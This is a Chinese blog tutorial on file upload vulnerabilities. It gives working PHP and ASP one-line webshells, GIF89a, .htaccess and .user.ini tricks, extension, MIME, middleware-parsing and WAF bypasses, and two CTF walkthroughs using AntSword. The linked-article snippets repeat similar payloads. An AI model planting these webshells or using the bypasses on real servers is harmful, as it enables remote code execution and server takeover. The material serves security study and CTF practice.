文件上传漏洞

最新推荐文章于 2024-05-13 18:02:23 发布
最新推荐文章于 2024-05-13 18:02:23 发布
阅读量1.1k 收藏 8
点赞数 3
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70683009/article/details/130794022
版权

文件上传漏洞原理

用户通过上传点上传恶意代码或文件,web端没有对用户上传的文件进行审计,从而实现控制web端的目的。

webshell的作用

简单的一句话木马:

<?php @eval($_POST['cmd']); ?>

POST传参:cmd=phpinfo();

这里是将我们通过变量cmd传递的内容当中PHP代码执行。类似于Linux系统里面的代码cmd=system(whomai) ;

蚁剑的使用

打开蚁剑,右击选择添加数据

连接密码为一句话木马参数变量名

 

各种形态的一句话木马

POST传参

<?php @eval($_POST['cmd']); ?>

利用方法如上

GET传参

<?php @eval($_GET['cmd']); ?>

1、直接通过传递执行命令来达到目的

 2、借POST方法间接达到目的:

 经常使用到的木马

1、标准一句话木马 <?php @eval($_POST['a']); ?>

2、GIF89a       //绕过内容识别 
   <script language='PHP'>eval($_POST['cmd']);</script>  //绕过php识别

3、GIF89a   //绕过内容识别
	<?php @eval($_POST['cmd']);?> 

4、<?= eval($_POST['cmd']);?>  //绕过对内容是否含有php进行检测

5、 <?= ?>相当于<?php echo >  这个是php的短标签,需要在php.ini开启short_open_tag
  
6、GIF89a  这个是文件的幻数头,可以绕过对文件头部内容的检测。
  
7、.htaccess文件里面的内容
  <FilesMatch "1.jpg">  //将1.jpg文件当作php文件执行
  SetHandler application/x-httpd-php
   </FilesMatch>
  或者 AddType application/x-httpd-php .jpg  //将jpg文件变成php文件执行

8、.user.ini文件里面的内容
	auto_prepend_file=11.gif   //我们后面要上传的文件名为11.gif

9、asp一句话木马  <%eval request ("a")%>

不同的开发环境需要用到的木马也不一样,但目的都是一样的

文件上传漏洞绕过

后缀名的绕过

①:在某些特定的情况下的后缀也能够被当作php文件进行解析,例如PHP2、php3、php4、phtml、pht等情况。

②:双写绕过  .phpphp  //存在一种可能就是在编辑过滤的时候只过滤了一次

③:大小写绕过将.phP文件名后缀大写

④:收尾去空绕过,在后缀名加空格(需要在抓到的数据包中加空格,直接在文件后缀名加空格会命名不成功,它会自动删除空格)

⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)

⑥:::$DATA:如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名。例如:cmd.php::$DATA,Windows会自动去掉末尾的::$DATA变成x.php

MIME绕过

抓包将Content-Type修改为image/jpeg  或者image/png......

中间件之服务器

中间件包括apache,tomcat,iis,weblogic等

1.IIS6.0版本

(1) 当建立.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作为asp文件解析。
(2) 当上传文件.asp;*.jpg IIS6.0会将文件当做asp文件解析。

2.apache低版本(2.x)

如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。例如:x.php.aaa.bbb.ccc.mmm,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。

3.apache换行解析漏洞(2.4.0--2.4.29)

在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

4.Nginx低版本、II7

上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。

5.Nginx文件名逻辑(0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7)

我们只需要上传一个空格结尾的文件,即可使PHP解析

WAF绕过

①:数据溢出

可以在文件名上大量写入数据

filename=aaaaaavvvvvvvvssssssssdsdadasdassfdsfdsf.php  //数据量自行测试

②:%00截断

%00;===》换行

③:重复数据防匹配

Content-Disposition: form-data; name="upload_file";filename="2.jpg";filename="2.jpg";filename="2.jpg";filename="2.jpg";......filename="2.php";

.user.ini和.htaccess的区别

  • .htaccess文件只能用于apahce,不能用于iisnginx等中间件
  • .user.ini只能用于Server APIFastCGI模式下,而正常情况下apache不是运行在此模块下的。
  • .htaccess.user.ini都只能用于访问本目录下的文件时进行覆盖。

例题

1、[HNCTF 2022 Week1]easy_upload

 直接上传.php文件,一点过滤都没有

上蚁剑

 

2、[GXYCTF 2019]BabyUpload (.htaccess)

打开题目可以看到上传点:

 上传一句话木马,上传.php文件显示如下

 提示我们后缀不能有ph

测试一下上面几种后缀名绕过可不可以,发现都不行

先上传.htaccess文件

显示上传类型太露骨了吧!应该是还有那些检查,修改一下 Content-Type

 上传成功

 接着上传1.jpg文件,内容为一句话木马

 

 竟然还是不行,猜测它可能去识别了内容,不能含有<?

上传下面一句话木马的文件

 

 上传成功

上蚁剑

 

连接成功,拿到flag

 

秃头女孩!
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件一句话木马getshell
qq_41620273的博客
12-25 5530
文件 文件流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
文件漏洞------一句话木马原理解析
m0_69151365的博客
03-11 1820
这是一个最简单的一句话木马,我们用GET参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上木马文件发现上成功了。接下来就开始抓包了。
一级必杀,防不胜防的漏洞,WEB安全基础入门—文件漏洞_practitioner remote code execution via polyglot we
最新发布
2401_84971562的博客
05-13 947
例题 4.pHp.php.jpg.php..asp;.jpg.p.phphp例题 5。
文件漏洞——.user.ini与.htaccess
zhhhb1005的博客
07-18 896
htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现重新解析规则绕过黑名单。...
【用一句话木马文件漏洞挖掘实战】
m0_68563451的博客
03-03 1147
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上,右键点击查看图像,可以拿到图片路径。3.点击上头像,将一句话木马改为图片形式上,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
Web安全:文件漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2466
现在大多的网站和Web应用系统都会有上功能(比如:文档,图片,头像,视频上等.),而程序员在开发文件功能时,没有对代码做严格校验上文件的后缀和文件类型. 此时攻击者就可以上一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
WebShell文件漏洞分析溯源
02-22
WebShell 文件漏洞分析溯源 一、WebShell 文件漏洞概述 WebShell 文件漏洞是指攻击者通过上恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
用友NC任意文件漏洞利用工具
04-14
用友NC任意文件漏洞利用工具,用友NC6.5的某个页面,存在任意文件漏洞漏洞成因在于上文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
文件漏洞的思维导图
04-19
总结了文件漏洞的相关知识
奇安信代码卫士,文件漏洞解决demo
04-23
奇安信代码卫士,文件漏洞解决demo; #### 文件可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上目录和上文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2....
计算机网络安全中文件漏洞及防御措施.pdf
09-19
计算机网络安全中文件漏洞及防御措施 计算机网络安全中文件漏洞是一种常见的Web安全漏洞,攻击者可以通过上恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件进行严格的校验检测,...
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上" );
BUU刷题记录——2
weixin_43610673的博客
06-17 1541
[极客大挑战 2019]Upload 上检测后缀名,文件内容不能有<? 上a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
PHP一句话木马
weixin_64338385的博客
12-03 1026
Get、 Post、Assert 首先在www目录下创建出对应文件 以 .php为后缀名 Get输入 <?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行 ?> 保存之后在网页访问 127.0.0.1/get.php?cmd=system(‘ipconfig’); 输入whoami,访问用户名 Post <?php @eval($_POST[‘cmd’]); ?> Post ...
PHP 代码审计 --------- 文件漏洞
qq_62344745的博客
04-19 531
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和“文件”本身是没有问题,有问题的是文件后,服有效的,务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA之PHP文件漏洞(File Upload)
热门推荐
Mi1k7ea
01-22 1万+
文件漏洞是指由于服务器对于用户上部分的控制不严格导致攻击者可以上一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3487
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上
文件一句话木马
weixin_46601529的博客
09-14 791
准备工具 上文件(一句话木马) 蚁剑,菜刀 需要攻击的网站 将<?php @eval($_POST['shell']);?>写入一个Php文件 ## 第二步寻找网站上点,并将webshell.php文件 最后寻找文件地址 利用蚁剑打开网站 登陆网站寻找在home中寻找到了flag ...
暴力破解与上漏洞-利用一句话木马和中国菜刀上漏洞获取权限
TheMagicMeHappy的博客
09-15 2012
知识储备: web后门(泛指webshell)可提供的功能 执行命令; 浏览文件; 辅助提权; 执行SQL语句; 反弹Shell; web后门基本原理 制作一个一句话木马php或者其他格式文件到目标服务器中 利用中国菜刀这类后门软件访问一句话木马文件 参考资料——《Web安全攻防:渗透测试实战指南》 参考资料——https://blog.csdn.net/xxxslinyue/art...
web网站文件漏洞和攻击-运维安全详细笔记
06-30
web网站文件漏洞和攻击-运维安全详细笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值